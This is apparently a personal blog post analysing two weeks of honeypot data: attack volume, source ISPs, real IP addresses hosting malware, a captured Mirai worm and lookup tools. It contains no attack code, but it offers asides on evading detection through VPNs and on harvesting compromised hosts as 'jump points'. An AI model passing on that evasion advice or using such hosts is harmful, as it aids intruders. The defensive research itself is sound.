Analyzing Honeypot Data after 2 Weeks

Two weeks ago I started a little experiment and set up the T-Pot honeypot collection on an AWS EC2 instance. This article describes what I’ve learned out analysing the collected data.

So much Noise

995,173 attacks against my server after 14 days! — There is a lot of background noise caused by fully automated attacks. So the chance is high that a real attack is overlooked.

As a defender you need to find proper ways to filter out all this noise, to a achieve a clean baseline and catch the real attackers.

To make that clear:
Most of the attacks are fully automated bots and worms, spreading through the internet in search of vulnerable machines. — It’s your responsibilty as the owner of an internet connected device, to ensure that your system is fully patched against common exploits and and default credentials are changed to increase security.

It’s almost impossible to locate the attackers

The attacks are coming from all over the world. Therefore, you should be careful with statements about which country is responsible for the most hacking attacks. But it seems like Ireland is used as some kind of gateway for automated or bot based hacking.

56 percentage of all attacks are coming from Ireland, through „Petersburg Internet Network ltd.”, a russian based ISP. [https://pinspb.ru/]

These are the top 10 attacking IPs, which use this ISP.

A quick check on https://www.ip2proxy.com/5.8.18.90#proxyresult shows that this IPs belong to a large VPN — owned by Petersburg Internet Network.

These are the most frequently network providers that are used for bot based hacking.

Only a small percentage of the attackers are using the TOR network.

So if you want to be noticed as an attacker, you should use TOR. If you want to remain undetected, you should use popular VPN and proxy providers to disappear in the crowd.

Suspicious File Downloads

After the attack bots got access to my honeypot, some of them tried to download additional tools and scripts.

Attack bot with IP 212.129.29.208, used a deticated server located in France and downloaded a script from 178.159.36.245, a server located in Russia.

The same attacker downloaded another script from 45.153.203.137. A windows computer based in Netherlands.

34.87.180.89 (a Google Cloud instance) downloads a DDoS bot written in Perl (check this article for further analysis of this script https://www.programmersought.com/article/29824452895/) from a computer located in China.

All in all it is always the same pattern. Attackers use VPN, proxy or cloud providers to launch automated attacks. In case of success they download further tools and scripts from previously hacked machines. In most cases this is malware that tries to spread further.

I think it’s possible to generate a list of hosts that are used as command and control servers over time. These could be missused by bad minded people for their own hacking attempts. So if you are looking for some jump points, running a honeypot could be a way…

Mirai

The honeypot also catched a mirai worm, which is known for building bot nets that could be used for DDOS attacks.

Let’s have a look into the downloaded shell script.

What is behind 45.153.203.129?

According to Shodan it is a computer located in the Netherlands that offers HTTP and SMB.

It’s possible to connect via ftp to this machine.

The /bins/ folder contains some binaries.

And according to virustotal.com this is the mirai worm.

I suppose this is not the only malware file the honeypot collected. The Dionaea docker container will surly contain more and I will check this later.

Strange Messages on the Wire

The bots send a lot of japanese and chinese gibberish in form of http request to different websites.

We can use Cyberchef to encode this strings.

And Google translate will reveal some strange messages.

The translation heavily depends on the symbols we remove from the orginal string. This feels a bit scary, so I personally don’t want to know what that actually means.

The same gibberish is send out on different ports like port 25. I think this could be some kind of DDoS against a list of targets, but I’m not sure.

SSH Input

The Cowrie honeypot also collected some SSH sessions and their input.

However, since most of this comes from bots, I will not investigate this data further for now. In the event of a real attack, however, this information can be very helpful.

Handy Tools

These tools have been very useful for further investigation:

• https://www.shodan.io
• https://talosintelligence.com/reputation_center
• https://www.ip2proxy.com/
• https://www.virustotal.com/gui/
• Cyberchef

Originally published at https://www.andreaswienes.de.